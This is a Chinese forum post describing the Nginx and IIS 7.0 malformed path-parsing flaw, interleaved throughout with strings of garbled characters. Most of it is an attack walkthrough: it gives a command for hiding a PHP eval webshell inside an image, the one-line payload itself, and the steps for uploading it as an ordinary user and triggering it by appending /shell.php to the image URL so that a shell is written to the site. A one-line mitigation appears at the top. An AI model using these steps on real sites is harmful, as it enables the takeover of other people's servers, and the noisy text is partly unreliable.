IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0
* O" G( M; h+ t( B7 c: s; e0 i bNginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。7 E" w$ Y; g( \2 n
__________________________________ 0 p: x, @/ Y: {& b" j5 L
& r; M6 H$ y% @% `4 O+ p# i先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载) + t2 p! M% V0 z* k4 N8 d8 W0 d9 a- W
先合并一张PHP一句话图片马,合并方法:
t% {7 t2 o$ X, \" X: W- s①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif 1 z/ |" v, o9 o) G/ F
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>" 2 N$ e/ b0 f: W, B: }& ?+ ?
图片随便找一张.
. P+ ]" o3 X, C& p3 g0 A5 |/ G一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?>
, b2 Q( d/ j5 s( j% o- i+ E然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
$ t# O7 k2 y6 G. N' w; b* s8 y找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。 % g: C5 q0 _% u- P" F# S. o
比如假设图片地址为 http://www.political-security.com/tupian/1.jpg1 }# c& S7 S& T" }
则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php& C" q% J G8 S8 E
然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php
: ]4 C) ~! U, u* Xshell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
; e( G! D- q# b0 P2 b8 y* }上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
# p8 r* J* t. T6 ~" j5 S+ J找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
G1 d" _5 L3 c* L }. Q8 O在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
2 x9 @- |) J" K" ^. x0 k剩下的就随便你去搞吧。
1 H* P+ b6 c9 m$ R8 \( }$ B; \! b1 B& O2 K( ^9 v
|